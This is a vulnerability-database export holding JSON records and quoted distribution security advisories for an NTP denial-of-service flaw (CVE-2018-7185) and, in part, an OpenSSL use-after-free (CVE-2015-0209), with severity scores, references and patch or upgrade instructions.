"None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-137217", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2018-7185", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2018-7185", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201803-141", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-137217", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-137217" }, { "db": "JVNDB", "id": "JVNDB-2018-002750" }, { "db": "NVD", "id": "CVE-2018-7185" }, { "db": "CNNVD", "id": "CNNVD-201803-141" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The protocol engine in ntp 4.2.6 before 4.2.8p11 allows a remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the \"other side\" of an interleaved association causing the victim ntpd to reset its association. ntp Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. NTP is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. \nNTP version 4.2.6 prior to 4.2.8p11 are vulnerable. protocol engine is one of the protocol engines. This issue only affected Ubuntu\n17.10 and Ubuntu 18.04 LTS. This issue only affected Ubuntu 17.10 and Ubuntu\n18.04 LTS. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201805-12\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: NTP: Multiple vulnerabilities\n Date: May 26, 2018\n Bugs: #649612\n ID: 201805-12\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould lead to remote code execution. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/ntp \u003c 4.2.8_p11 \u003e= 4.2.8_p11 \n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8_p11\"\n\nReferences\n==========\n\n[ 1 ] CVE-2018-7170\n https://nvd.nist.gov/vuln/detail/CVE-2018-7170\n[ 2 ] CVE-2018-7182\n https://nvd.nist.gov/vuln/detail/CVE-2018-7182\n[ 3 ] CVE-2018-7183\n https://nvd.nist.gov/vuln/detail/CVE-2018-7183\n[ 4 ] CVE-2018-7184\n https://nvd.nist.gov/vuln/detail/CVE-2018-7184\n[ 5 ] CVE-2018-7185\n https://nvd.nist.gov/vuln/detail/CVE-2018-7185\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201805-12\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2018 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. ==========================================================================\nUbuntu Security Notice USN-3707-2\nJanuary 23, 2019\n\nntp vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in NTP. \n\nSoftware Description:\n- ntp: Network Time Protocol daemon and utility programs\n\nDetails:\n\nUSN-3707-1 and USN-3349-1 fixed several vulnerabilities in NTP. This\nupdate provides the corresponding update for Ubuntu 12.04 ESM. \n\nOriginal advisory details:\n\n Miroslav Lichvar discovered that NTP incorrectly handled certain\n spoofed addresses when performing rate limiting. \n (CVE-2016-7426)\n\n Matthew Van Gundy discovered that NTP incorrectly handled certain\n crafted broadcast mode packets. \n (CVE-2016-7427, CVE-2016-7428)\n\n Matthew Van Gundy discovered that NTP incorrectly handled certain\n control mode packets. A remote attacker could use this issue to set or\n unset traps. (CVE-2016-9310)\n\n Matthew Van Gundy discovered that NTP incorrectly handled the trap\n service. (CVE-2016-9311)\n\n It was discovered that the NTP legacy DPTS refclock driver incorrectly\n handled the /dev/datum device. (CVE-2017-6462)\n\n It was discovered that NTP incorrectly handled certain invalid\n settings in a :config directive. A remote authenticated user could\n possibly use this issue to cause NTP to crash, resulting in a denial\n of service. (CVE-2017-6463)\n\n Michael Macnair discovered that NTP incorrectly handled certain\n responses. A remote attacker could possibly use this issue to execute\n arbitrary code. (CVE-2018-7183)\n\n Miroslav Lichvar discovered that NTP incorrectly handled certain\n zero-origin timestamps. (CVE-2018-7185)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 ESM:\n ntp 1:4.2.6.p3+dfsg-1ubuntu3.12\n\nIn general, a standard system update will make all the necessary\nchanges. \n\nReferences:\n https://usn.ubuntu.com/usn/usn-3707-2\n https://usn.ubuntu.com/usn/usn-3707-1\n CVE-2016-7426, CVE-2016-7427, CVE-2016-7428, CVE-2016-9310,\n CVE-2016-9311, CVE-2017-6462, CVE-2017-6463, CVE-2018-7183,\n CVE-2018-7185\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security] ntp (SSA:2018-060-02)\n\nNew ntp packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix security issues. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz: Upgraded. \n This release addresses five security issues in ntpd:\n * LOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil vulnerability:\n ephemeral association attack. While fixed in ntp-4.2.8p7, there are\n significant additional protections for this issue in 4.2.8p11. \n Reported by Matt Van Gundy of Cisco. \n * INFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909: ctl_getitem(): buffer\n read overrun leads to undefined behavior and information leak. \n Reported by Yihan Lian of Qihoo 360. \n * LOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple authenticated\n ephemeral associations. Reported on the questions@ list. \n * LOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved symmetric mode\n cannot recover from bad state. Reported by Miroslav Lichvar of Red Hat. \n * LOW/MEDIUM: Sec 3454 / CVE-2018-7185 / VU#961909: Unauthenticated packet\n can reset authenticated interleaved association. \n Reported by Miroslav Lichvar of Red Hat. \n For more information, see:\n http://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p11-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p11-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p11-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p11-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 package:\n01c86ddfabec68d52877336258d064c7 ntp-4.2.8p11-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nb2d36d96f9a4d84df3586d38b8b47389 ntp-4.2.8p11-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n78b4e9221e725dcb45160950bfc926d0 ntp-4.2.8p11-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\ne0d32ed484e02ad28c59838e6407d549 ntp-4.2.8p11-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n81690d8e511b403f0fe89c1d120f5049 ntp-4.2.8p11-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\nd2c877e3d1b9c7ce003ef090c7610c74 ntp-4.2.8p11-x86_64-1_slack14.2.txz\n\nSlackware -current package:\nc3ee95d3944b09c2e891883dc5411a6f n/ntp-4.2.8p11-i586-1.txz\n\nSlackware x86_64 -current package:\nfa9c7a8aca0c769791e34a8e48e6d260 n/ntp-4.2.8p11-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p11-i586-1_slack14.2.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. |\n+------------------------------------------------------------------------+\n-----BEGIN PGP SIGNATURE-----\n\niEYEARECAAYFAlqYjI8ACgkQakRjwEAQIjM5rACfdDAWRxL2nQATj8HFDPgCVInK\n13MAnR04OluKfiEsJVgO6uWJKXy2HOGq\n=FRx7\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2018-7185" }, { "db": "JVNDB", "id": "JVNDB-2018-002750" }, { "db": "BID", "id": "103339" }, { "db": "VULHUB", "id": "VHN-137217" }, { "db": "PACKETSTORM", "id": "148455" }, { "db": "PACKETSTORM", "id": "147917" }, { "db": "PACKETSTORM", "id": "151287" }, { "db": "PACKETSTORM", "id": "146631" } ], "trust": 2.34 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-7185", "trust": 3.2 }, { "db": "BID", "id": "103339", "trust": 2.0 }, { "db": "PACKETSTORM", "id": "146631", "trust": 1.8 }, { "db": "JVNDB", "id": "JVNDB-2018-002750", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201803-141", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-137217", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "148455", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "147917", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "151287", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-137217" }, { "db": "BID", "id": "103339" }, { "db": "JVNDB", "id": "JVNDB-2018-002750" }, { "db": "PACKETSTORM", "id": "148455" }, { "db": "PACKETSTORM", "id": "147917" }, { "db": "PACKETSTORM", "id": "151287" }, { "db": "PACKETSTORM", "id": "146631" }, { "db": "NVD", "id": "CVE-2018-7185" }, { "db": "CNNVD", "id": "CNNVD-201803-141" } ] }, "id": "VAR-201803-1822", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-137217" } ], "trust": 0.01 }, "last_update_date": "2023-12-18T11:45:29.732000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "NTP Bug 3454", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/ntpbug3454" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.slackware.com/" }, { "title": "Synology-SA-18:13", "trust": 0.8, "url": "https://www.synology.com/support/security/synology_sa_18_13" }, { "title": "NTP protocol Repair measures for engine security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=78915" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-002750" }, { "db": "CNNVD", "id": "CNNVD-201803-141" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 }, { "problemtype": "CWE-20", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-137217" }, { "db": "JVNDB", "id": "JVNDB-2018-002750" }, { "db": "NVD", "id": "CVE-2018-7185" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.securityfocus.com/bid/103339" }, { "trust": 2.3, "url": "http://packetstormsecurity.com/files/146631/slackware-security-advisory-ntp-updates.html" }, { "trust": 2.0, "url": "http://support.ntp.org/bin/view/main/ntpbug3454" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201805-12" }, { "trust": 1.7, "url": "http://www.securityfocus.com/archive/1/541824/100/0/threaded" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20180626-0001/" }, { "trust": 1.7, "url": "https://www.synology.com/support/security/synology_sa_18_13" }, { "trust": 1.7, "url": "https://security.freebsd.org/advisories/freebsd-sa-18:02.ntp.asc" }, { "trust": 1.7, "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "trust": 1.7, "url": "https://usn.ubuntu.com/3707-1/" }, { "trust": 1.7, "url": "https://usn.ubuntu.com/3707-2/" }, { "trust": 1.6, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbux03962en_us" }, { "trust": 1.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7185" }, { "trust": 0.9, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7185" }, { "trust": 0.6, "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019verbose-5072833.html" }, { "trust": 0.3, "url": "http://www.ntp.org/" }, { "trust": 0.3, "url": "https://www.oracle.com/technetwork/topics/security/bulletinapr2018-4443185.html" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7184" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7182" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7183" }, { "trust": 0.2, "url": "https://usn.ubuntu.com/usn/usn-3707-1" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7170" }, { "trust": 0.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbux03962en_us" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p4+dfsg-3ubuntu5.9" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p10+dfsg-5ubuntu3.3" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.13" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p10+dfsg-5ubuntu7.1" }, { "trust": 0.1, "url": "https://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://usn.ubuntu.com/usn/usn-3707-2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9310" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6462" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9311" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7426" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6463" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7182" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1549" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1549" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7184" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7170" }, { "trust": 0.1, "url": "http://support.ntp.org/bin/view/main/securitynotice#february_2018_ntp_4_2_8p11_ntp_s" } ], "sources": [ { "db": "VULHUB", "id": "VHN-137217" }, { "db": "BID", "id": "103339" }, { "db": "JVNDB", "id": "JVNDB-2018-002750" }, { "db": "PACKETSTORM", "id": "148455" }, { "db": "PACKETSTORM", "id": "147917" }, { "db": "PACKETSTORM", "id": "151287" }, { "db": "PACKETSTORM", "id": "146631" }, { "db": "NVD", "id": "CVE-2018-7185" }, { "db": "CNNVD", "id": "CNNVD-201803-141" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-137217" }, { "db": "BID", "id": "103339" }, { "db": "JVNDB", "id": "JVNDB-2018-002750" }, { "db": "PACKETSTORM", "id": "148455" }, { "db": "PACKETSTORM", "id": "147917" }, { "db": "PACKETSTORM", "id": "151287" }, { "db": "PACKETSTORM", "id": "146631" }, { "db": "NVD", "id": "CVE-2018-7185" }, { "db": "CNNVD", "id": "CNNVD-201803-141" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-03-06T00:00:00", "db": "VULHUB", "id": "VHN-137217" }, { "date": "2018-02-27T00:00:00", "db": "BID", "id": "103339" }, { "date": "2018-04-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-002750" }, { "date": "2018-07-09T23:38:43", "db": "PACKETSTORM", "id": "148455" }, { "date": "2018-05-26T22:55:24", "db": "PACKETSTORM", "id": "147917" }, { "date": "2019-01-23T21:28:55", "db": "PACKETSTORM", "id": "151287" }, { "date": "2018-03-01T23:35:00", "db": "PACKETSTORM", "id": "146631" }, { "date": "2018-03-06T20:29:01.500000", "db": "NVD", "id": "CVE-2018-7185" }, { "date": "2018-03-07T00:00:00", "db": "CNNVD", "id": "CNNVD-201803-141" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-08-24T00:00:00", "db": "VULHUB", "id": "VHN-137217" }, { "date": "2018-08-15T10:00:00", "db": "BID", "id": "103339" }, { "date": "2018-04-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-002750" }, { "date": "2020-08-24T17:37:01.140000", "db": "NVD", "id": "CVE-2018-7185" }, { "date": "2020-08-25T00:00:00", "db": "CNNVD", "id": "CNNVD-201803-141" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "148455" }, { "db": "PACKETSTORM", "id": "147917" }, { "db": "PACKETSTORM", "id": "151287" }, { "db": "CNNVD", "id": "CNNVD-201803-141" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ntp Input validation vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-002750" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201803-141" } ], "trust": 0.6 } }
var-201503-0052
Vulnerability from variot
Use-after-free vulnerability in the d2i_ECPrivateKey function in crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed Elliptic Curve (EC) private-key file that is improperly handled during import. Supplementary information : CWE Vulnerability type by CWE-416: Use-after-free ( Use of freed memory ) Has been identified. OpenSSL is prone to remote memory-corruption vulnerability. Note: This issue was previously discussed in BID 73196 (OpenSSL Multiple Unspecified Security Vulnerabilities) but has been given its own record to better document it. Successfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the application using the vulnerable library. Failed exploit attempts will result in denial-of-service conditions. This update reverts the defective patch applied in that update causing these problems. Additionally a follow-up fix for CVE-2015-0209 is applied.
Multiple vulnerabilities have been discovered in OpenSSL, a Secure Sockets Layer toolkit. The Common Vulnerabilities and Exposures project identifies the following issues:
CVE-2015-0286
Stephen Henson discovered that the ASN1_TYPE_cmp() function
can be crashed, resulting in denial of service.
CVE-2015-0287
Emilia Kaesper discovered a memory corruption in ASN.1 parsing.
CVE-2015-0292
It was discovered that missing input sanitising in base64 decoding
might result in memory corruption.
CVE-2015-0209
It was discovered that a malformed EC private key might result in
memory corruption.
CVE-2015-0288
It was discovered that missing input sanitising in the
X509_to_X509_REQ() function might result in denial of service.
For the stable distribution (wheezy), these problems have been fixed in version 1.0.1e-2+deb7u16. Please review the CVE identifiers and the upstream advisory referenced below for details:
- RSA silently downgrades to EXPORT_RSA [Client] (Reclassified) (CVE-2015-0204)
- Segmentation fault in ASN1_TYPE_cmp (CVE-2015-0286)
- ASN.1 structure reuse memory corruption (CVE-2015-0287)
- X509_to_X509_REQ NULL pointer deref (CVE-2015-0288)
- PKCS7 NULL pointer dereferences (CVE-2015-0289)
- Base64 decode (CVE-2015-0292)
- DoS via reachable assert in SSLv2 servers (CVE-2015-0293)
- Use After Free following d2i_ECPrivatekey error (CVE-2015-0209)
The following issues affect OpenSSL 1.0.2 only which is not part of the supported Gentoo stable tree:
- OpenSSL 1.0.2 ClientHello sigalgs DoS (CVE-2015-0291)
- Multiblock corrupted pointer (CVE-2015-0290)
- Segmentation fault in DTLSv1_listen (CVE-2015-0207)
- Segmentation fault for invalid PSS parameters (CVE-2015-0208)
- Empty CKE with client auth and DHE (CVE-2015-1787)
- Handshake with unseeded PRNG (CVE-2015-0285)
Impact
A remote attacker can utilize multiple vectors to cause Denial of Service or Information Disclosure. Tools such as revdep-rebuild may assist in identifying some of these packages.
References
[ 1 ] CVE-2015-0204 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0204 [ 2 ] CVE-2015-0207 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0207 [ 3 ] CVE-2015-0208 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0208 [ 4 ] CVE-2015-0209 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0209 [ 5 ] CVE-2015-0285 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0285 [ 6 ] CVE-2015-0287 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0287 [ 7 ] CVE-2015-0288 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0288 [ 8 ] CVE-2015-0289 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0289 [ 9 ] CVE-2015-0290 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0290 [ 10 ] CVE-2015-0291 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0291 [ 11 ] CVE-2015-0292 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0292 [ 12 ] CVE-2015-0293 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0293 [ 13 ] CVE-2015-1787 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1787 [ 14 ] OpenSSL Security Advisory [19 Mar 2015] http://openssl.org/news/secadv_20150319.txt
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201503-11
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. OpenSSL Security Advisory [19 Mar 2015] =======================================
OpenSSL 1.0.2 ClientHello sigalgs DoS (CVE-2015-0291)
Severity: High
If a client connects to an OpenSSL 1.0.2 server and renegotiates with an invalid signature algorithms extension a NULL pointer dereference will occur. This can be exploited in a DoS attack against the server.
This issue affects OpenSSL version: 1.0.2
OpenSSL 1.0.2 users should upgrade to 1.0.2a.
This issue was was reported to OpenSSL on 26th February 2015 by David Ramos of Stanford University. The fix was developed by Stephen Henson and Matt Caswell of the OpenSSL development team.
Reclassified: RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)
Severity: High
This security issue was previously announced by the OpenSSL project and classified as "low" severity. This severity rating has now been changed to "high".
This was classified low because it was originally thought that server RSA export ciphersuite support was rare: a client was only vulnerable to a MITM attack against a server which supports an RSA export ciphersuite. Recent studies have shown that RSA export ciphersuites support is far more common.
This issue affects OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen Henson of the OpenSSL core team. It was previously announced in the OpenSSL security advisory on 8th January 2015.
Multiblock corrupted pointer (CVE-2015-0290)
Severity: Moderate
